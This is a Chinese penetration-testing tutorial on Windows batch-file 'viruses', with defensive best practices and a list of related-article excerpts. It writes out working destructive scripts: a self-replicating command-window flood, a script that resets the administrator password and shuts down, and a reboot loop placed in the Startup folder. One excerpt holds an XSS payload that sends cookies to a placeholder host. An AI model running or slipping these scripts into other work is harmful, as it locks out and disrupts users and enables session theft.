#渗透测试#SRC漏洞挖掘# 操作系统-windows系统bat病毒

免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。                                                              #陇羽sec#
 

目录

什么是bat 病毒

资源耗尽病毒

锁机病毒

无限重启病毒

 windows 系统目录接管与渗透的关系

开机自启目录

BAT病毒的传播方式

电子邮件附件

文件共享网络

恶意网站

USB设备

社交工程学

 防范BAT病毒的最佳实践

使用防病毒软件

更新操作系统和软件

谨慎处理电子邮件附件

避免使用不明来源的软件

启用防火墙

定期备份数据

教育和培训

关闭不必要的系统功能

使用复杂的密码

审查系统自启动项


什么是bat 病毒

BAT病毒是一种通过批处理(BAT)文件创建恶意行为的病毒。以下是关于BAT病毒的一些特点:

  • 恶意行为表现

    • 无限循环导致系统卡死:例如通过在BAT文件中编写代码无限循环打开命令提示符(CMD),从而使计算机卡死。像“%0”这样的代码可以用来循环执行整个BAT文件,而简单写法甚至可以省略“cmd”,仅用“start”就能打开CMD,若再加上开机自动启动代码并隐藏在磁盘角落,会造成电脑性能下降,对用户造成困扰 。

    • 整蛊行为:如远程弹窗刷屏、设置关闭显示器、让系统崩溃、编写假蓝屏代码等行为。可以编写批处理文件(.bat)让计算机蓝屏,不过这种操作可能导致数据丢失和系统损坏。

  • 病毒防范与清除:存在针对BAT病毒的清除工具(.bat文件形式),但可能会被360等杀毒软件误认成病毒,此时需要用户选择信任该文件以执行其保护计算机的功能。

BAT病毒主要是利用批处理文件的一些特性来执行破坏计算机功能或者影响计算机正常使用的操作。

资源耗尽病毒
echo start cmd > 1.txt
echo %0 >> 1.txt
ren 1.txt 1.bat

命令解释

这个命令序列的目的是创建一个批处理文件(.bat),并将当前批处理文件的名称写入该文件中。
命令1: echo start cmd > 1.txt

    解释: 这个命令将字符串 start cmd 写入到一个名为 1.txt 的文本文件中。
    效果: 创建了一个名为 1.txt 的文件,文件内容为 start cmd。

命令2: echo %0 >> 1.txt

    解释: 这个命令将当前批处理文件的名称(%0)追加到 1.txt 文件中。
    效果: 1.txt 文件的内容现在变为 start cmd 后跟当前批处理文件的名称。

命令3: ren 1.txt  1.bat

    解释: 这个命令将 1.txt 文件重命名为 1.bat 。
    效果: 1.txt 文件被重命名为 1.bat ,现在它是一个批处理文件。
锁机病毒
echo net user adminstrator 123456 > c:\windows\Temp\1.bat
echo shutdown /n /t 0 >> c:\windows\Temp\1.bat




这条命令的作用是将 net user adminstrator 123456 这行命令写入到 c:\windows\Temp\1.bat 文件中。

    echo:用于输出指定的内容。
    net user adminstrator 123456:这条命令尝试将 adminstrator 用户的密码设置为 123456。
    > c:\windows\Temp\1.bat :将输出的内容重定向到 c:\windows\Temp\1.bat 文件中。

这条命令的作用是将 shutdown /n /t 0 这行命令追加到 c:\windows\Temp\1.bat 文件中。

    echo:用于输出指定的内容。
    shutdown /n /t 0:这条命令用于立即关闭计算机。
        /n:表示立即关闭。
        /t 0:表示延迟时间为0秒。
    >> c:\windows\Temp\1.bat :将输出的内容追加到 c:\windows\Temp\1.bat 文件中。

运行这个批处理文件将会:

    尝试将 adminstrator 用户的密码设置为 123456。
    立即关闭计算机。
无限重启病毒
echo shutdown /n /t 0 > c:\windows\Temp\1.bat
copy c:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

命令1: echo shutdown /n /t 0 > c:\windows\Temp\1.bat

    功能: 创建一个批处理文件 1.bat 并写入命令 shutdown /n /t 0。
    解释:
        echo: 输出指定的字符串或命令。
        shutdown /n /t 0: 这是Windows的关机命令,/n 表示不记录关机事件,/t 0 表示立即关机。
        > c:\windows\Temp\1.bat: 将输出的内容重定向到文件 c:\windows\Temp\1.bat 。

命令2: copy c:\windows\Temp\1.bat  "%USERPROFILE%\AppDate\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

    功能: 将创建的批处理文件复制到Windows启动文件夹中。
    解释:
        copy: 复制文件的命令。
        c:\windows\Temp\1.bat: 源文件路径。
        "%USERPROFILE%\AppDate\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\": 目标文件夹路径。注意,AppDate 应该是 AppData,这是一个常见的拼写错误。
 windows 系统目录接管与渗透的关系
"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup\"
这个路径指向的是Windows操作系统中的启动文件夹。任何被放置在这个文件夹内的程序或脚本都会在用户登录后自动运行。
开机自启目录
c:\windows\Temp\1.bat
(重启自动清空缓存)
文件“c:\windows\Temp\1.bat ”是一个批处理文件(Batch file),它包含了Windows操作系统可以执行的一系列命令。批处理文件通常用于自动化重复性的任务,例如启动程序、移动文件、设置系统参数等。

请注意,位于系统临时文件夹(如C:\Windows\Temp)中的批处理文件可能包含敏感信息或执行特定的系统操作。如果您不是创建者或不熟悉该文件的内容,建议您谨慎对待,并确保您的系统安全措施到位。

如果您想查看该批处理文件的内容,可以尝试以下步骤:

    定位文件:首先,导航到C:\Windows\Temp文件夹。请注意,由于这是系统文件夹,您可能需要管理员权限来访问和查看其中的文件。
    打开文件:找到名为1.bat 的文件后,双击它可能会直接执行其中的命令。如果您只想查看其内容而不执行它,可以右键点击文件,然后选择“编辑”或“记事本”来打开它。这将显示文件中的命令和脚本。
    注意安全风险:由于这是系统临时文件夹中的文件,它可能包含临时或敏感信息。请确保您了解文件的来源和内容,以避免潜在的安全风险。

BAT病毒的传播方式

电子邮件附件

发送带有恶意代码的电子邮件附件是BAT病毒常见的传播方式之一。攻击者通常会伪装成可信的来源,诱导收件人下载并执行附件中的BAT文件,从而感染目标系统。

文件共享网络

在局域网或公共文件共享网络中,用户可能会无意间下载并执行包含BAT病毒的文件。这些文件可能被命名得极具诱惑力,诱使用户点击打开。

恶意网站

访问被植入恶意代码的网站也可能导致BAT病毒的传播。这些网站可能包含自动下载并执行恶意BAT文件的脚本,用户在不知情的情况下就会受到感染。

USB设备

通过USB驱动器等可移动存储设备传播BAT病毒也是一种常见手段。攻击者可能将恶意BAT文件复制到这些设备上,当其他用户插入这些设备时,如果他们不小心执行了其中的文件,就会导致病毒感染。

社交工程学

攻击者还可能利用社交工程学技巧,诱导用户执行特定的操作,如下载并运行某个文件,从而传播BAT病毒。这通常涉及到欺骗或误导用户,使其相信某个行为是安全的。

 防范BAT病毒的最佳实践

使用防病毒软件

使用可靠的防病毒软件是防范BAT病毒及其他类型病毒的基础。确保防病毒软件始终保持最新状态,以便能够检测和防御最新的威胁。定期进行全系统扫描,及时发现并清除潜在的病毒。

更新操作系统和软件

及时给操作系统和所有应用程序打上补丁,修复安全漏洞。许多病毒都是利用软件漏洞进行传播的,因此保持系统和软件的最新状态是防止病毒感染的关键。

谨慎处理电子邮件附件

不要随意打开来自不明来源的电子邮件附件,特别是那些带有.exe、.com或其他可执行文件扩展名的附件。如果必须打开附件,先用防病毒软件进行扫描。

避免使用不明来源的软件

从官方或可信的来源下载和安装软件,避免使用盗版软件或从不明网站下载的软件。这些软件可能包含恶意代码,包括BAT病毒。

启用防火墙

确保操作系统的防火墙处于启用状态,它可以阻止未经授权的访问和潜在的恶意流量。此外,也可以考虑安装第三方防火墙软件,提供更高级别的保护。

定期备份数据

定期备份重要数据,以防万一遭受病毒攻击或其他类型的灾难。可以选择使用外部硬盘、网络存储或云服务进行备份。

教育和培训

提高自身的网络安全意识,了解常见的网络攻击手段和防范措施。对于组织来说,定期进行员工网络安全培训也是非常重要的。

关闭不必要的系统功能

关闭不需要的系统功能和服务,减少潜在的攻击面。例如,如果不需要远程桌面协议(RDP),应该关闭此功能以防止被黑客利用。

使用复杂的密码

设置强密码,并定期更换。避免在不同的账户上使用相同的密码,以防止一处泄露导致多处受影响。

审查系统自启动项

定期审查系统自启动项,移除不需要的自启动程序。这样可以防止某些病毒通过自启动机制重新感染系统。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/911512.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

vscode ssh连接autodl失败

autodl服务器已开启,vscode弹窗显示连接失败 0. 检查状态 这里的端口和主机根据自己的连接更改 ssh -p 52165 rootregion-45.autodl.pro1. 修改config权限 按返回的路径找到config文件 右键--属性--安全--高级--禁用继承--从此对象中删除所有已继承的权限--添加…

阿里云-部署CNI flannel集群网络

环境 1.一台阿里云作为k8s-master:8.130.XXX.231(阿里云私有IP) 2.Vmware 两个虚拟机分别作为 k8s-node1:192.168.40.131 k8s-node2:192.168.40.131 3.安装Docker 部署过程 k8s-master,k8s-node1,k8s-node2 初始操作 # 关闭防火墙 systemctl stop fi…

CentOS 7 软件/程序安装示例

安装软件/程序 wget,前提需要用 root 用户 1、搜索软件/程序 yum search wget 搜索到软件/程序。 2、安装软件/程序 yum -y install wget 安装完成。 ---------------------------------------------------------------------------------------------------…

[HCTF 2018]WarmUp 1--详细解析

打开靶机&#xff0c;进入界面&#xff1a; 信息搜集 当前界面没有任何有用信息。 想到查看页面源代码。右键–查看页面源代码 看到hint&#xff1a;<!--source.php--> 进入/source.php页面&#xff0c;看到页面源代码&#xff1a; <?phphighlight_file(__FILE_…

Python的函数

一、定义 函数的定义&#xff1a;实现【特定功能】的代码块。 形参&#xff1a;函数定义时的参数&#xff0c;没有实际意义 实参&#xff1a;函数调用/使用时的参数&#xff0c;有实际意义 函数的作用&#xff1a; 简化代码提高代码重用性便于维护和修改提高代码的可扩展性…

ctfshow(319->326)--XSS漏洞--反射型XSS

Web319 思路 先测试过滤&#xff0c;发现过滤了script、img&#xff0c;没有过滤body&#xff0c;svg payload: <body onload"location.hrefhttp://xx.xx.xx.xx/flag.php?cookiedocument.cookie"/><svg onload"location.hrefhttp://xx.xx.xx.xx/fla…

MySQL server 免安装教程

1&#xff0c;下载免安装包-社区版本 https://dev.mysql.com/downloads/file/?id534320 2&#xff0c;解压 放到一电脑某个路径下&#xff0c;整个包 3&#xff0c;创建data 文件夹和my.ini文件 my.ini代码照抄&#xff0c;注意修改路径&#xff0c;与解压后的安装包地址一…

使用ookii-dialogs-wpf在WPF选择文件夹时能输入路径

在进行WPF开发时&#xff0c;System.Windows.Forms.FolderBrowserDialog的选择文件夹功能不支持输入路径&#xff1a; 希望能够获得下图所示的选择文件夹功能&#xff1a; 于是&#xff0c;通过NuGet中安装Ookii.Dialogs.Wpf包&#xff0c;并创建一个简单的工具类&#xff1a; …

Java项目实战II基于Spring Boot的便利店信息管理系统(开发文档+数据库+源码)

目录 一、前言 二、技术介绍 三、系统实现 四、文档参考 五、核心代码 六、源码获取 全栈码农以及毕业设计实战开发&#xff0c;CSDN平台Java领域新星创作者&#xff0c;专注于大学生项目实战开发、讲解和毕业答疑辅导。获取源码联系方式请查看文末 一、前言 在快节奏的…

SpringBoot整合Liquibase对数据库管理和迁移

简介 Liquibase是一个用于用于跟踪、管理和应用数据库变化的开源工具&#xff0c;通过日志文件(changelog)的形式记录数据库的变更(changeset)&#xff0c;然后执行日志文件中的修改&#xff0c;将数据库更新或回滚(rollback)到一致的状态。它的目标是提供一种数据库类型无关的…

练习LabVIEW第四十三题

学习目标&#xff1a; 模拟红绿灯&#xff0c;红灯亮十秒&#xff0c;绿灯亮五秒&#xff0c;交替&#xff0c;并用波形图将波形显示 开始编写&#xff1a; 前面板 两个指示灯&#xff0c;一个红色&#xff0c;一个绿色&#xff0c;一个波形图&#xff1b; 程序框图 创建…

针对解决前后端BUG的个人笔记

1-IDEA Q&#xff1a;Required Java version 17 is not supported by SDK 1.8. The maximum supported Java version is 8. A: 我们只知道IDEA页面创建Spring项目&#xff0c;其实是访问spring initializr去创建项目。故我们可以通过阿里云国服去间接创建Spring项目。将https…

ElasticSearch 添加IK分词器

ElasticSearch 添加IK分词器 前言一、IK分词器的算法二、Ik分词器的下载安装&#xff08;Winows 版本&#xff09;三、Ik分词器的下载安装&#xff08;Linux 版本&#xff09;四、验证测试&#xff08;postman工具&#xff09;测试 ik_smart 分词算法测试 ik_max_word 分词算法…

Android关机流程知多少?

在 Android 中&#xff0c;关机流程涉及系统各个组件的协同工作&#xff0c;确保设备在断电之前能够安全地关闭所有活动并保存数据。以下是 Android 系统中关机流程的详细介绍&#xff1a; 1. 用户触发关机请求 关机流程由用户的操作触发&#xff0c;通常有以下几种方式&#…

Golang | Leetcode Golang题解之第542题01矩阵

题目&#xff1a; 题解&#xff1a; type point struct{x, y int }var dirs []point{{-1, 0}, {1, 0}, {0, -1}, {0, 1}}func updateMatrix(mat [][]int) [][]int {var m, n len(mat), len(mat[0])var res make([][]int, m)var visited make([][]bool, m)var queue []poin…

基于ssm的小区物业管理系统

项目描述 临近学期结束&#xff0c;还是毕业设计&#xff0c;你还在做java程序网络编程&#xff0c;期末作业&#xff0c;老师的作业要求觉得大了吗?不知道毕业设计该怎么办?网页功能的数量是否太多?没有合适的类型或系统?等等。这里根据疫情当下&#xff0c;你想解决的问…

_处理匿名命名空间里的变量时进入硬件中断错误

最近在初次使用匿名空间时出现一个很离谱的错误&#xff0c;我先简单描述一下情形&#xff1a;在匿名命名空间里有一个变量&#xff08;全局&#xff09;&#xff0c;在命名空间外&#xff0c;有一个内联函数操作该空间内的变量。 如果开优化&#xff0c;那么程序就会进入硬件错…

esp32学习:利用虫洞ESP32开发板,快速实现无线图传

我们的虫洞开发板&#xff0c;能够完美运行esp who AI代码&#xff0c;所以实现无线图传那是非常容易的&#xff0c;我们先看看examples目录&#xff1a; 里面有比较多的web例程&#xff0c;在这些例程下&#xff0c;稍作修改&#xff0c;就可以快速实现我的图传无线功能&#…

芯片需要按一下keyup或者复位按键虚拟或者下载之后芯片能下载却运行不了或者需要额外供电。

这些问题很有可能是因为外围电路器件幅值与设计不同的存在&#xff0c;导致你需要外部供电才能实现一个正常运行&#xff0c;可以检查一下外围电路在供电区域的电流区&#xff0c;电阻幅值是否和原理图设计时看的一模一样或者直接更换 因为按键会失灵&#xff0c;首先检查复位按…

万字长文读懂RAG

目录 RAG的整体架构设计 一、概览 1-Overview 2-Indexing 3-Retrival 4-Generation 二、优化元素提问 5-Multi Query多查询策略 6-RAG-Fusion多查询结果融合策略 7-Decomposition问题分解策略 Answer recursively Answer individually 8-Step Back问答回退策略 9…